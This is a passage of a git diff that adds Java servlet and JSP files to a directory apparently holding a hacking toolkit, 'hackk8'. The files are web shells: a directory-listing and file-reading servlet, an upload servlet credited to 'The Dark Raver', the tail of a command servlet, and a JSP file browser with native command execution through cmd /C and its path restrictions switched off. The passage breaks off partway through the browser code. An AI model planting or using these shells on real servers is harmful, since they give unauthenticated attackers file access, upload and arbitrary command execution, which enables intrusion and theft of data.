    "); + out.print(""); + } + + public String getServletInfo() { + return "CmdServlet 0.1"; + } + +} diff --git a/jsp/hackk8/jsp_77/ListServlet.class b/jsp/hackk8/jsp_77/ListServlet.class new file mode 100644 index 0000000..b816179 Binary files /dev/null and b/jsp/hackk8/jsp_77/ListServlet.class differ diff --git a/jsp/hackk8/jsp_77/ListServlet.java b/jsp/hackk8/jsp_77/ListServlet.java new file mode 100644 index 0000000..1d97304 --- /dev/null +++ b/jsp/hackk8/jsp_77/ListServlet.java @@ -0,0 +1,86 @@ +/* + * ListServlet.java + * + * @author Sierra + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.ServletException; +import javax.servlet.http.*; + +public class ListServlet extends HttpServlet +{ + + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + PrintWriter printwriter = res.getWriter(); + String path = req.getParameter("file"); + + printwriter.write("\n\nDirectory Listing\n\n\n"); + printwriter.write("\n"); + if(req.getParameter("file")==null) path = "c:\\"; + printwriter.write("

    Path: " + path + "

    \n");
+
+		File file = new File(path);
+
+		if(file.isDirectory())
+		{
+			String s = new String("Unknown");
+			String s2 = new String("Black");
+			File afile[] = file.listFiles();
+			for(int i = 0; i < afile.length; i++)
+			{
+				String s1 = new String(afile[i].toString());
+				printwriter.write("(");
+				String s3;
+				if(afile[i].isDirectory())
+				{
+					printwriter.write("d");
+					s1 = s1 + "/";
+					s3 = new String("Blue");
+				} else
+				if(afile[i].isFile())
+				{
+					printwriter.write("-");
+					s3 = new String("Green");
+				} else
+				{
+					printwriter.write("?");
+					s3 = new String("Red");
+				}
+				if(afile[i].canRead())
+					printwriter.write("r");
+				else
+					printwriter.write("-");
+				if(afile[i].canWrite())
+					printwriter.write("w");
+				else
+					printwriter.write("-");
+				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n");
+			}
+
+			printwriter.write("
    ");
+		} else
+		if(file.canRead())
+		{
+			FileInputStream fileinputstream = new FileInputStream(file);
+			int j = 0;
+				while(j >= 0)
+				{
+					j = fileinputstream.read();
+					printwriter.write(j);
+				}
+			fileinputstream.close();
+		} else
+		{
+			printwriter.write("Can't Read file
    ");
+		}
+
+    }
+
+
+    public String getServletInfo() {
+        return "Directory Listing";
+    }
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp_77/UpServlet.class b/jsp/hackk8/jsp_77/UpServlet.class
new file mode 100644
index 0000000..fef990e
Binary files /dev/null and b/jsp/hackk8/jsp_77/UpServlet.class differ
diff --git a/jsp/hackk8/jsp_77/UpServlet.java b/jsp/hackk8/jsp_77/UpServlet.java
new file mode 100644
index 0000000..4936667
--- /dev/null
+++ b/jsp/hackk8/jsp_77/UpServlet.java
@@ -0,0 +1,71 @@
+/*
+ * UpServlet.java	29/04/2005
+ *
+ * @author The Dark Raver
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.*;
+import javax.servlet.http.*;
+
+
+public class UpServlet extends HttpServlet {
+
+    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		res.setContentType("text/html");
+		PrintWriter out = res.getWriter();
+		out.print("");
+		out.print("
    ");
+		out.print("UPLOAD ");
+		out.print("");
+		out.print("
    ");
+		out.print("");
+	}
+
+
+    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		String tag = new String();
+		int c = '\0';
+		int contador = 0;
+		ServletInputStream in = req.getInputStream();
+        DataInputStream post = new DataInputStream(in);
+
+		PrintWriter out = res.getWriter();
+		res.setContentType("text/html");
+		out.print("
    ");
+
+		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
+			tag=tag.concat("" + (char)c);
+			contador++;
+			}
+
+		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
+
+		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
+		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
+
+		// (!) Uploaded File Name
+
+		File newfile = new File("c:\\install.log");
+
+		/////////////////////////
+
+		FileOutputStream fileout = new FileOutputStream(newfile);
+
+		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
+			c=post.read();
+			fileout.write((char)c);
+			}
+
+		fileout.close();
+		out.print("<== OK");
+
+    }
+
+
+    public String getServletInfo() {
+		return "UpServlet 0.1";
+    }
+
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp_77/browser.jsp b/jsp/hackk8/jsp_77/browser.jsp
new file mode 100644
index 0000000..7d85dc8
--- /dev/null
+++ b/jsp/hackk8/jsp_77/browser.jsp
@@ -0,0 +1,1802 @@
+<%--
+	jsp File browser 1.1a
+	Copyright (C) 2003,2004, Boris von Loesch
+	This program is free software; you can redistribute it and/or modify it under
+	the terms of the GNU General Public License as published by the
+	Free Software Foundation; either version 2 of the License, or (at your option)
+	any later version.
+	This program is distributed in the hope that it will be useful, but
+	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
+	FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+	You should have received a copy of the GNU General Public License along with
+	this program; if not, write to the
+	Free Software Foundation, Inc.,
+	59 Temple Place, Suite 330,
+	Boston, MA 02111-1307 USA
+	- Description: jsp File browser v1.1a -- This JSP program allows remote web-based
+				file access and manipulation.  You can copy, create, move and delete files.
+				Text files can be edited and groups of files and folders can be downloaded
+				as a single zip file that's created on the fly.
+	- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
+--%>
+<%@page import="java.util.*,
+                java.net.*,
+                java.text.*,
+                java.util.zip.*,
+                java.io.*"
+%>
+<%!
+    //FEATURES
+    private static final boolean NATIVE_COMMANDS = true;
+
+    //Allow browsing and file manipulation only in certain directories
+	private static final boolean RESTRICT_BROWSING = false;
+    //If true, the user is allowed to browse only in RESTRICT_PATH,
+    //if false, the user is allowed to browse all directories besides RESTRICT_PATH
+    private static final boolean RESTRICT_WHITELIST = false;
+    //Paths, sperated by semicolon
+    //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
+	private static final String RESTRICT_PATH = "/etc;/var";
+
+    //The refresh time in seconds of the upload monitor window
+	private static final int UPLOAD_MONITOR_REFRESH = 2;
+	//The number of colums for the edit field
+	private static final int EDITFIELD_COLS = 85;
+	//The number of rows for the edit field
+	private static final int EDITFIELD_ROWS = 30;
+	//Open a new window to view a file
+	private static final boolean USE_POPUP = true;
+	/**
+	 * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
+	 * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
+	 * This can yield to performance issues. Turn it of, if the directory loads to slow.
+	 */
+	private static final boolean USE_DIR_PREVIEW = true;
+	private static final int DIR_PREVIEW_NUMBER = 10;
+	/**
+	 * The name of an optional CSS Stylesheet file
+	 */
+	private static final String CSS_NAME = "Browser.css";
+	/**
+	 * The compression level for zip file creation (0-9)
+	 * 0 = No compression
+	 * 1 = Standard compression (Very fast)
+	 * ...
+	 * 9 = Best compression (Very slow)
+	 */
+	private static final int COMPRESSION_LEVEL = 1;
+	/**
+	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+	 * server runs on a windows platform, to avoid a message box, if you try to access
+	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
+	 */
+	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
+
+	/**
+	 * Command of the shell interpreter and the parameter to run a programm
+	 */
+	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
+	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
+
+	/**
+	 * Max time in ms a process is allowed to run, before it will be terminated
+	 */
+	private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
+
+	//Button names
+	private static final String SAVE_AS_ZIP = "Download selected files as zip";
+	private static final String RENAME_FILE = "Rename File";
+	private static final String DELETE_FILES = "Delete selected files";
+	private static final String CREATE_DIR = "Create Dir";
+	private static final String CREATE_FILE = "Create File";
+	private static final String MOVE_FILES = "Move Files";
+	private static final String COPY_FILES = "Copy Files";
+
+	//Normally you should not change anything after this line
+	//----------------------------------------------------------------------------------
+	//Change this to locate the tempfile directory for upload (not longer needed)
+	private static String tempdir = ".";
+	private static String VERSION_NR = "1.1a";
+	private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
+
+	public class UplInfo {
+
+		public long totalSize;
+		public long currSize;
+		public long starttime;
+		public boolean aborted;
+
+		public UplInfo() {
+			totalSize = 0l;
+			currSize = 0l;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public UplInfo(int size) {
+			totalSize = size;
+			currSize = 0;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public String getUprate() {
+			long time = System.currentTimeMillis() - starttime;
+			if (time != 0) {
+				long uprate = currSize * 1000 / time;
+				return convertFileSize(uprate) + "/s";
+			}
+			else return "n/a";
+		}
+
+		public int getPercent() {
+			if (totalSize == 0) return 0;
+			else return (int) (currSize * 100 / totalSize);
+		}
+
+		public String getTimeElapsed() {
+			long time = (System.currentTimeMillis() - starttime) / 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+		public String getTimeEstimated() {
+			if (currSize == 0) return "n/a";
+			long time = System.currentTimeMillis() - starttime;
+			time = totalSize * time / currSize;
+			time /= 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+	}
+
+	public class FileInfo {
+
+		public String name = null, clientFileName = null, fileContentType = null;
+		private byte[] fileContents = null;
+		public File file = null;
+		public StringBuffer sb = new StringBuffer(100);
+
+		public void setFileContents(byte[] aByteArray) {
+			fileContents = new byte[aByteArray.length];
+			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+		}
+	}
+
+	public static class UploadMonitor {
+
+		static Hashtable uploadTable = new Hashtable();
+
+		static void set(String fName, UplInfo info) {
+			uploadTable.put(fName, info);
+		}
+
+		static void remove(String fName) {
+			uploadTable.remove(fName);
+		}
+
+		static UplInfo getInfo(String fName) {
+			UplInfo info = (UplInfo) uploadTable.get(fName);
+			return info;
+		}
+	}
+
+	// A Class with methods used to process a ServletInputStream
+	public class HttpMultiPartParser {
+
+		private final String lineSeparator = System.getProperty("line.separator", "\n");
+		private final int ONE_MB = 1024 * 1;
+
+		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+				int clength) throws IllegalArgumentException, IOException {
+			if (is == null) throw new IllegalArgumentException("InputStream");
+			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+					"\"" + boundary + "\" is an illegal boundary indicator");
+			boundary = "--" + boundary;
+			StringTokenizer stLine = null, stFields = null;
+			FileInfo fileInfo = null;
+			Hashtable dataTable = new Hashtable(5);
+			String line = null, field = null, paramName = null;
+			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+			boolean isFile = false;
+			if (saveFiles) { // Create the required directory (including parent dirs)
+				File f = new File(saveInDir);
+				f.mkdirs();
+			}
+			line = getLine(is);
+			if (line == null || !line.startsWith(boundary)) throw new IOException(
+					"Boundary not found; boundary = " + boundary + ", line = " + line);
+			while (line != null) {
+				if (line == null || !line.startsWith(boundary)) return dataTable;
+				line = getLine(is);
+				if (line == null) return dataTable;
+				stLine = new StringTokenizer(line, ";\r\n");
+				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				line = stLine.nextToken().toLowerCase();
+				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+						"Bad data in second line");
+				stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				fileInfo = new FileInfo();
+				stFields.nextToken();
+				paramName = stFields.nextToken();
+				isFile = false;
+				if (stLine.hasMoreTokens()) {
+					field = stLine.nextToken();
+					stFields = new StringTokenizer(field, "=\"");
+					if (stFields.countTokens() > 1) {
+						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+							fileInfo.name = paramName;
+							String value = stFields.nextToken();
+							if (value != null && value.trim().length() > 0) {
+								fileInfo.clientFileName = value;
+								isFile = true;
+							}
+							else {
+								line = getLine(is); // Skip "Content-Type:" line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Position to boundary line
+								continue;
+							}
+						}
+					}
+					else if (field.toLowerCase().indexOf("filename") >= 0) {
+						line = getLine(is); // Skip "Content-Type:" line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Position to boundary line
+						continue;
+					}
+				}
+				boolean skipBlankLine = true;
+				if (isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					if (line.trim().length() < 1) skipBlankLine = false;
+					else {
+						stLine = new StringTokenizer(line, ": ");
+						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+								"Bad data in third line");
+						stLine.nextToken(); // Content-Type
+						fileInfo.fileContentType = stLine.nextToken();
+					}
+				}
+				if (skipBlankLine) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+				}
+				if (!isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					dataTable.put(paramName, line);
+					// If parameter is dir, change saveInDir to dir
+					if (paramName.equals("dir")) saveInDir = line;
+					line = getLine(is);
+					continue;
+				}
+				try {
+					UplInfo uplInfo = new UplInfo(clength);
+					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+					OutputStream os = null;
+					String path = null;
+					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+							fileInfo.clientFileName));
+					else os = new ByteArrayOutputStream(ONE_MB);
+					boolean readingContent = true;
+					byte previousLine[] = new byte[2 * ONE_MB];
+					byte temp[] = null;
+					byte currentLine[] = new byte[2 * ONE_MB];
+					int read, read3;
+					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+						line = null;
+						break;
+					}
+					while (readingContent) {
+						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+							line = null;
+							uplInfo.aborted = true;
+							break;
+						}
+						if (compareBoundary(boundary, currentLine)) {
+							os.write(previousLine, 0, read - 2);
+							line = new String(currentLine, 0, read3);
+							break;
+						}
+						else {
+							os.write(previousLine, 0, read);
+							uplInfo.currSize += read;
+							temp = currentLine;
+							currentLine = previousLine;
+							previousLine = temp;
+							read = read3;
+						}//end else
+					}//end while
+					os.flush();
+					os.close();
+					if (!saveFiles) {
+						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+						fileInfo.setFileContents(baos.toByteArray());
+					}
+					else fileInfo.file = new File(path);
+					dataTable.put(paramName, fileInfo);
+					uplInfo.currSize = uplInfo.totalSize;
+				}//end try
+				catch (IOException e) {
+					throw e;
+				}
+			}
+			return dataTable;
+		}
+
+		/**
+		 * Compares boundary string to byte array
+		 */
+		private boolean compareBoundary(String boundary, byte ba[]) {
+			byte b;
+			if (boundary == null || ba == null) return false;
+			for (int i = 0; i < boundary.length(); i++)
+				if ((byte) boundary.charAt(i) != ba[i]) return false;
+			return true;
+		}
+
+		/** Convenience method to read HTTP header lines */
+		private synchronized String getLine(ServletInputStream sis) throws IOException {
+			byte b[] = new byte[1024];
+			int read = sis.readLine(b, 0, b.length), index;
+			String line = null;
+			if (read != -1) {
+				line = new String(b, 0, read);
+				if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+			}
+			return line;
+		}
+
+		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+			String path = null;
+			if (dir == null || fileName == null) throw new IllegalArgumentException(
+					"dir or fileName is null");
+			int index = fileName.lastIndexOf('/');
+			String name = null;
+			if (index >= 0) name = fileName.substring(index + 1);
+			else name = fileName;
+			index = name.lastIndexOf('\\');
+			if (index >= 0) fileName = name.substring(index + 1);
+			path = dir + File.separator + fileName;
+			if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+			else return path.replace('/', File.separatorChar);
+		}
+	} //End of class HttpMultiPartParser
+
+	/**
+	 * This class is a comparator to sort the filenames and dirs
+	 */
+	class FileComp implements Comparator {
+
+		int mode;
+		int sign;
+
+		FileComp() {
+			this.mode = 1;
+			this.sign = 1;
+		}
+
+		/**
+		 * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+		 * The default sorting method is by Name
+		 * Negative mode means descending sort
+		 */
+		FileComp(int mode) {
+			if (mode < 0) {
+				this.mode = -mode;
+				sign = -1;
+			}
+			else {
+				this.mode = mode;
+				this.sign = 1;
+			}
+		}
+
+		public int compare(Object o1, Object o2) {
+			File f1 = (File) o1;
+			File f2 = (File) o2;
+			if (f1.isDirectory()) {
+				if (f2.isDirectory()) {
+					switch (mode) {
+					//Filename or Type
+					case 1:
+					case 4:
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					//Filesize
+					case 2:
+						return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+					//Date
+					case 3:
+						return sign
+								* (new Long(f1.lastModified())
+										.compareTo(new Long(f2.lastModified())));
+					default:
+						return 1;
+					}
+				}
+				else return -1;
+			}
+			else if (f2.isDirectory()) return 1;
+			else {
+				switch (mode) {
+				case 1:
+					return sign
+							* f1.getAbsolutePath().toUpperCase().compareTo(
+									f2.getAbsolutePath().toUpperCase());
+				case 2:
+					return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+				case 3:
+					return sign
+							* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+				case 4: { // Sort by extension
+					int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+					int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+					if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					}
+					// f1 has no extension
+					else if (tempIndexf1 == -1) return -sign;
+					// f2 has no extension
+					else if (tempIndexf2 == -1) return sign;
+					// Both have an extension
+					else {
+						String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf1);
+						String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf2);
+						return sign * tempEndf1.compareTo(tempEndf2);
+					}
+				}
+				default:
+					return 1;
+				}
+			}
+		}
+	}
+
+	/**
+	 * Wrapperclass to wrap an OutputStream around a Writer
+	 */
+	class Writer2Stream extends OutputStream {
+
+		Writer out;
+
+		Writer2Stream(Writer w) {
+			super();
+			out = w;
+		}
+
+		public void write(int i) throws IOException {
+			out.write(i);
+		}
+
+		public void write(byte[] b) throws IOException {
+			for (int i = 0; i < b.length; i++) {
+				int n = b[i];
+				//Convert byte to ubyte
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+
+		public void write(byte[] b, int off, int len) throws IOException {
+			for (int i = off; i < off + len; i++) {
+				int n = b[i];
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+	} //End of class Writer2Stream
+
+	static Vector expandFileList(String[] files, boolean inclDirs) {
+		Vector v = new Vector();
+		if (files == null) return v;
+		for (int i = 0; i < files.length; i++)
+			v.add(new File(URLDecoder.decode(files[i])));
+		for (int i = 0; i < v.size(); i++) {
+			File f = (File) v.get(i);
+			if (f.isDirectory()) {
+				File[] fs = f.listFiles();
+				for (int n = 0; n < fs.length; n++)
+					v.add(fs[n]);
+				if (!inclDirs) {
+					v.remove(i);
+					i--;
+				}
+			}
+		}
+		return v;
+	}
+
+	/**
+	 * Method to build an absolute path
+	 * @param dir the root dir
+	 * @param name the name of the new directory
+	 * @return if name is an absolute directory, returns name, else returns dir+name
+	 */
+	static String getDir(String dir, String name) {
+		if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+		File mv = new File(name);
+		String new_dir = null;
+		if (!mv.isAbsolute()) {
+			new_dir = dir + name;
+		}
+		else new_dir = name;
+		return new_dir;
+	}
+
+	/**
+	 * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+	 *     @param size The size in bytes
+	 *     @return String with size and unit
+	 */
+	static String convertFileSize(long size) {
+		int divisor = 1;
+		String unit = "bytes";
+		if (size >= 1024 * 1024) {
+			divisor = 1024 * 1024;
+			unit = "MB";
+		}
+		else if (size >= 1024) {
+			divisor = 1024;
+			unit = "KB";
+		}
+		if (divisor == 1) return size / divisor + " " + unit;
+		String aftercomma = "" + 100 * (size % divisor) / divisor;
+		if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+		return size / divisor + "." + aftercomma + " " + unit;
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+		copyStreamsWithoutClose(in, out, buffer);
+		in.close();
+		out.close();
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+			throws IOException {
+		int b;
+		while ((b = in.read(buffer)) != -1)
+			out.write(buffer, 0, b);
+	}
+
+	/**
+	 * Returns the Mime Type of the file, depending on the extension of the filename
+	 */
+	static String getMimeType(String fName) {
+		fName = fName.toLowerCase();
+		if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+		else if (fName.endsWith(".gif")) return "image/gif";
+		else if (fName.endsWith(".pdf")) return "application/pdf";
+		else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+		else if (fName.endsWith(".avi")) return "video/x-msvideo";
+		else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+		else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+		else if (fName.endsWith(".zip")) return "application/zip";
+		else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+		else if (fName.endsWith(".rtf")) return "application/rtf";
+		else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+		else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+				|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+				|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+		else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+		else if (fName.endsWith(".png")) return "image/png";
+		else if (fName.endsWith(".xml")) return "text/xml";
+		else if (fName.endsWith(".svg")) return "image/svg+xml";
+		else if (fName.endsWith(".mp3")) return "audio/mp3";
+		else if (fName.endsWith(".ogg")) return "audio/ogg";
+		else return "text/plain";
+	}
+
+	/**
+	 * Converts some important chars (int) to the corresponding html string
+	 */
+	static String conv2Html(int i) {
+		if (i == '&') return "&";
+		else if (i == '<') return "<";
+		else if (i == '>') return ">";
+		else if (i == '"') return """;
+		else return "" + (char) i;
+	}
+
+	/**
+	 * Converts a normal string to a html conform string
+	 */
+	static String conv2Html(String st) {
+		StringBuffer buf = new StringBuffer();
+		for (int i = 0; i < st.length(); i++) {
+			buf.append(conv2Html(st.charAt(i)));
+		}
+		return buf.toString();
+	}
+
+	/**
+	 * Starts a native process on the server
+	 * 	@param command the command to start the process
+	 *	@param dir the dir in which the process starts
+	 */
+	static String startProcess(String command, String dir) throws IOException {
+		StringBuffer ret = new StringBuffer();
+		String[] comm = new String[3];
+		comm[0] = COMMAND_INTERPRETER[0];
+		comm[1] = COMMAND_INTERPRETER[1];
+		comm[2] = command;
+		long start = System.currentTimeMillis();
+		try {
+			//Start process
+			Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+			//Get input and error streams
+			BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+			BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+			boolean end = false;
+			while (!end) {
+				int c = 0;
+				while ((ls_err.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_err.read()));
+				}
+				c = 0;
+				while ((ls_in.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_in.read()));
+				}
+				try {
+					ls_proc.exitValue();
+					//if the process has not finished, an exception is thrown
+					//else
+					while (ls_err.available() > 0)
+						ret.append(conv2Html(ls_err.read()));
+					while (ls_in.available() > 0)
+						ret.append(conv2Html(ls_in.read()));
+					end = true;
+				}
+				catch (IllegalThreadStateException ex) {
+					//Process is running
+				}
+				//The process is not allowed to run longer than given time.
+				if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
+					ls_proc.destroy();
+					end = true;
+					ret.append("!!!! Process has timed out, destroyed !!!!!");
+				}
+				try {
+					Thread.sleep(50);
+				}
+				catch (InterruptedException ie) {}
+			}
+		}
+		catch (IOException e) {
+			ret.append("Error: " + e);
+		}
+		return ret.toString();
+	}
+
+	/**
+	 * Converts a dir string to a linked dir string
+	 * 	@param dir the directory string (e.g. /usr/local/httpd)
+	 *	@param browserLink web-path to Browser.jsp
+	 */
+	static String dir2linkdir(String dir, String browserLink, int sortMode) {
+		File f = new File(dir);
+		StringBuffer buf = new StringBuffer();
+		while (f.getParentFile() != null) {
+			if (f.canRead()) {
+				String encPath = URLEncoder.encode(f.getAbsolutePath());
+				buf.insert(0, "" + conv2Html(f.getName()) + File.separator + "");
+			}
+			else buf.insert(0, conv2Html(f.getName()) + File.separator);
+			f = f.getParentFile();
+		}
+		if (f.canRead()) {
+			String encPath = URLEncoder.encode(f.getAbsolutePath());
+			buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + "");
+		}
+		else buf.insert(0, f.getAbsolutePath());
+		return buf.toString();
+	}
+
+	/**
+	 *	Returns true if the given filename tends towards a packed file
+	 */
+	static boolean isPacked(String name, boolean gz) {
+		return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
+				|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
+				.endsWith(".war"));
+	}
+
+	/**
+	 *	If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
+	 */
+	static boolean isAllowed(File path) throws IOException{
+		if (RESTRICT_BROWSING) {
+            StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
+            while (stk.hasMoreTokens()){
+			    if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
+                    return RESTRICT_WHITELIST;
+            }
+            return !RESTRICT_WHITELIST;
+		}
+		else return true;
+	}
+
+	//---------------------------------------------------------------------------------------------------------------
+
+	%>
+<%
+		//Get the current browsing directory
+		request.setAttribute("dir", request.getParameter("dir"));
+		// The browser_name variable is used to keep track of the URI
+		// of the jsp file itself.  It is used in all link-backs.
+		final String browser_name = request.getRequestURI();
+		final String FOL_IMG = "";
+		boolean nohtml = false;
+		boolean dir_view = true;
+		// View file
+		if (request.getParameter("file") != null) {
+            File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)) {
+                request.setAttribute("dir", f.getParent());
+                request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath());
+            }
+            else if (f.exists() && f.canRead()) {
+                if (isPacked(f.getName(), false)) {
+                    //If zipFile, do nothing here
+                }
+                else{
+                    String mimeType = getMimeType(f.getName());
+                    response.setContentType(mimeType);
+                    if (mimeType.equals("text/plain")) response.setHeader(
+                            "Content-Disposition", "inline;filename=\"temp.txt\"");
+                    else response.setHeader("Content-Disposition", "inline;filename=\""
+                            + f.getName() + "\"");
+                    BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
+                    byte buffer[] = new byte[8 * 1024];
+                    out.clearBuffer();
+                    OutputStream out_s = new Writer2Stream(out);
+                    copyStreamsWithoutClose(fileInput, out_s, buffer);
+                    fileInput.close();
+                    out_s.flush();
+                    nohtml = true;
+                    dir_view = false;
+                }
+            }
+            else {
+                request.setAttribute("dir", f.getParent());
+                request.setAttribute("error", "File " + f.getAbsolutePath()
+                        + " does not exist or is not readable on the server");
+            }
+		}
+		// Download selected files as zip file
+		else if ((request.getParameter("Submit") != null)
+				&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
+			Vector v = expandFileList(request.getParameterValues("selfile"), false);
+			//Check if all files in vector are allowed
+			String notAllowedFile = null;
+			for (int i = 0;i < v.size(); i++){
+				File f = (File) v.get(i);
+				if (!isAllowed(f)){
+					notAllowedFile = f.getAbsolutePath();
+					break;
+				}
+			}
+			if (notAllowedFile != null){
+				request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
+			}
+			else if (v.size() == 0) {
+				request.setAttribute("error", "No files selected");
+			}
+			else {
+				File dir_file = new File("" + request.getAttribute("dir"));
+				int dir_l = dir_file.getAbsolutePath().length();
+				response.setContentType("application/zip");
+				response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
+				out.clearBuffer();
+				ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
+				zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
+				zipout.setLevel(COMPRESSION_LEVEL);
+				for (int i = 0; i < v.size(); i++) {
+					File f = (File) v.get(i);
+					if (f.canRead()) {
